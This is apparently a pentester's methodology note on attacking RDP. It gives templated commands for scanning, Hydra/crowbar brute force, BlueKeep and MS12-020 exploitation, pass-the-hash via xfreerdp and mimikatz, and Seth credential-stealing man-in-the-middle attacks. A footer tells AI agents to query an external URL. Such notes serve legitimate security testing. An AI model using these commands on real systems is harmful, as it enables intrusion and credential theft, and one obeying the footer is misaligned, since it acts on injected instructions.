# 3389 - RDP

### Overview

The `Remote Desktop Protocol (RDP)` is a proprietary protocol developed by Microsoft, which provides a user with a graphical interface to connect to another computer over a network connection. The user employs `RDP` client software for this purpose, while the other computer must run a `RDP` server software.

`RDP` authentication mechanism rely on Windows local or Active Directory domain credentials.

**Network Level Authentication NLA**

`RDP` may uses `Network Level Authentication (NLA)`, introduced in `RDP 6.0` and supported initially in Microsoft Windows Vista / Windows Server 2008, which requires the connecting user to authenticate before a session is established with the server and prevents the use of resources on the server from the load of the graphical login screen.

**Restricted Admin mode**

The `Restricted Admin mode` is a security feature introduced in the Microsoft Windows 8.1 and Server 2012 R2 operating systems. The feature has been backported to Windows 7 and Server 2008.

`Restricted Admin mode` prevents the connecting user's credentials to be stored on the remote host by transforming the logon to a `network logon` (`Type 3`) instead of a `remote interactive logon` (`Type 10`). Indeed, for `remote interactive logon`, the plaintext password is provided and the user's credentials are stored in the `LSASS` process of the remote host. In `Restricted Admin mode`, no form of credentials (plaintext password, `LM` / `NTLM` hashes or `kerberos` `TGT`) are stored on the remote host.

`Restricted Admin mode` must be enabled on the remote host (`DisableRestrictedAdmin` registry key to (`REG_DWORD`) `0` which is not the case by default) and the client must connect in `Restricted Admin mode` (for example: `mstsc.exe /restrictedAdmin`). Note that enabling `Restricted Admin mode` allow `Pass-the-hash` authentication over `RDP`.

Only members of the local `Administrators` group may authenticate in `Restricted Admin` mode and the network identity (for remote access over the network) of the `RDP` session will, by default, be authenticated using the `RDP` host machine account. This authentication using the `RDP` host machine account can be disabled by setting the `DisableRestrictedAdminOutboundCreds` registry key to (`REG_DWORD`) `1`.

### Network scan

`Nmap` and the `Metasploit`'s `auxiliary/scanner/rdp/rdp_scanner` module can be used to scan the network for `RDP` services.

`Nmap`'s service and default `RDP` scripts scan may allow for the retrieval of information about the hosts (`NetBIOS` / `DNS` hostname, Windows product version, `SSL` / `TLS` subject and issuer, etc.). `Metasploit`'s `auxiliary/scanner/rdp/rdp_scanner` module will check whether or not `NLA` is enabled.

```
nmap -n -Pn -v -p 3389 -sV -sC -oA <NMAP_OUTPUT> <RANGE | CIDR>

msf > use auxiliary/scanner/rdp/rdp_scanner
msf auxiliary(scanner/rdp/rdp_scanner) > set RHOSTS <HOSTNAME | IP | CIDR | file:<PATH>>
```

### Authentication brute force

The local or Active Directory domain account lockout policies apply (depending on the type of authentication tried) when connecting in `RDP`. Vertical brute forcing may thus not be possible.

However, horizontal `RDP` brute forcing can be used for lateral movement once an account has been compromised. Indeed, the compromised account may not be a member of the local `Administrators` group (and thus can not connect through `PsExec` like tool for example) but can be a member of the `Remote Desktop Users` group.

`Patator`, `Hydra` or the `crowbar` Python Script can be used to brute force `RDP` access. `Patator` and `crowbar` both support `NLA` (as of December 2018, `Hydra` does not support no NLA RDP brute force).

```
python crowbar.py -b rdp (-u <USERNAME | <DOMAIN\\USERNAME> | -U USERNAME_FILE) (-c <PASSWORD> | -C <PASSWORDS_LIST) -s <CIDR>

hydra -t 1 -V -l <USERNAME> (-p <PASSWORD> | -P <PASSWORDS_LIST) rdp://<IP | HOST>
```

### Known vulnerabilities

`nmap` can be used to check for the `CVE-2012-0002` / `MS12-020` exploit. The `Metasploit`'s `auxiliary/scanner/rdp/cve_2019_0708_bluekeep` module and `rdpscan` can be used to scan for `BlueKeep` / `CVE-2019-0708`.

```
# BlueKeep CVE-2019-0708
msf> use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
# set RHOSTS file:<PATH>
# set THREADS <THREADS_NUMBER>

rdpscan.exe --file E:\Keolis\1-Wales\1-Pentest\hosts\IP.txt

# CVE-2012-0002 / MS12-020
nmap -v -p 3389 --script rdp-vuln-ms12-020 <HOST>
msf> use auxiliary/scanner/rdp/ms12_020_check
```

**BlueKeep CVE-2019-0708**

An heap corruption can occur in the RDP protocol that allows for arbitrary code execution at the system level pre-authentication.

Microsoft identified the following Windows versions as vulnerable:

* Windows XP
* Windows Vista
* Windows 7
* Windows Server 2003
* Windows Server 2008
* Windows Server 2008 R2

Windows versions newer than Windows 7 and Windows Server 2012 are not vulnerable.

The `Metasploit` module `exploit/windows/rdp/cve_2019_0708_bluekeep_rce` can be used to exploit the vulnerability. Note that the exploit is not yet polished.

```
msf> use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
```

**CVE-2012-0002 / MS12-020**

The `CVE-2012-0002` / `MS12-020` vulnerability can be used both to realize a Denial Of Service and remotely execute code on the target.

The `Metasploit`'s `auxiliary/dos/windows/rdp/ms12_020_maxchannelids` may be used to realize a `DoS` of the target:

```
msf> use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
```

As of December 2018, no public proof-of-concept code that results in remote code execution is available.

### RDP clients

**Windows**

On Windows, the default `Microsoft Remote Desktop` (`mstsc.exe`) application ("Connexion Bureau à distance") or the `Remote Desktop Manager` and `mRemoteNG` third parties applications can be used as `RDP` clients.

The `Remote Desktop Manager` and `mRemoteNG` clients allow for the configuration and storing of multiples `RDP` connections (host and authentication information). A free edition of `Remote Desktop Manager` is available as well as a commercial grade enterprise edition.

**Linux**

On Linux, `FreeRDP` (`xfreerdp`), `rdesktop` or `Remmina` (GUI) can be used as `RDP` clients.

```
# xfreerdp.

xfreerdp [/size:<SCREEN_SIZE_PERCENT>%] /u:'<DOMAIN | WORKGROUP>\<USERNAME>' /p:'<PASSWORD>' /v:<HOSTNAME | IP>[:<PORT>]

# Disables NLA for host that do not require Network Level Authentication.
xfreerdp -sec-nla /u:'<DOMAIN | WORKGROUP>\<USERNAME>' /p:'<PASSWORD>' /v:<HOSTNAME | IP>

# Connection in restricted admin mode.
xfreerdp /restricted-admin /u:'<DOMAIN | WORKGROUP>\<USERNAME>' /p:'<PASSWORD>' /v:<HOSTNAME | IP>

# For RD Web Access through a Remote Desktop gateway.
# The <RDP_FILE> corresponds to the RDP client configuration file retrieved from the RD Web Access web interface.
xfreerdp <RDP_FILE> /d:<DOMAIN | WORKGROUP> /u:<USERNAME> /p:'<PASSWORD>' /gt:rpc

# rdesktop.
rdesktop -d '<DOMAIN | WORKGROUP>' -u '<USERNAME>' <HOSTNAME | IP>[:<PORT>]
```

### Pass-the-hash over RDP

The `xfreerdp` client on Linux and `mimikatz` with the built-in `mstsc.exe` client on Windows can be used to authenticate using an account's `NTLM` hash through `RDP`. The remote hosts must support the `Restricted Admin mode` feature.

```
# Linux.
xfreerdp /u:'<DOMAIN | WORKGROUP>\<USERNAME>' /pth:<HASH> /v:<HOSTNAME | IP>

# Windows.
# The Remote Desktop Connection (mstsc.exe) client will display the currently logged user information but the network connection will be established using the identity specified to mimikatz's sekurlsa::pth.
sekurlsa::pth /domain:<. | DOMAIN_FQDN> /user:<USERNAME> /ntlm:<NT_HASH> /run:"mstsc.exe /restrictedadmin"
```

### Man-in-the-middle attack

`Seth` is a tool written in Python and Bash to MitM `RDP` connections that attempts to downgrade the connection in order to extract clear text credentials.

`Seth` can be used regardless if `Network Level Authentication (NLA)` is enabled or not on the targeted `RDP` host.

`Seth` will notably:

* Spoof `ARP` replies to redirect traffic from the victim host to the attacker machine and then to the target RDP server.
* Configure an `iptable` rule to reject `SYN` packet to prevent direct `RDP` authentication.
* Clone the `SSL` certificate (only replacing the public key and signature)
* Block traffic to port 88 to downgrade `Kerberos` authentication to `NTLM`.

Note that the user will be presented with a certificate error warning that must be accepted before the clear text credentials are sent.

In case of a successful attack:

* Clear text credentials of the user login in are obtained
* A command can be executed on the targeted host
* Victim keyboard inputs are retrieved

```
# Unless the RDP host is on the same subnet as the victim machine, the last IP address must be that of the gateway.
# The COMMAND is executed on the RDP host by simulating WIN+R
# The COMMAND should not contains special characters (powershell -enc <STRING> can be used)

seth.sh <INTERFACE> <ATTACKER_IP> <VICTIM_IP> <GATEWAY_IP | HOST_IP> [<COMMAND>]
```

### Session Hijacking

If `Administrator` / `NT AUTHORITY\SYSTEM` privileges could be obtained on a host, `RDP` sessions of others users can be hijacked. This could be used to access the host as the hijacked user through a GUI interface with out knowing its password.

To hijack `RDP` session refer to the `[Windows] Post Exploitation` note.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://notes.qazeer.io/l7/methodology-18.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.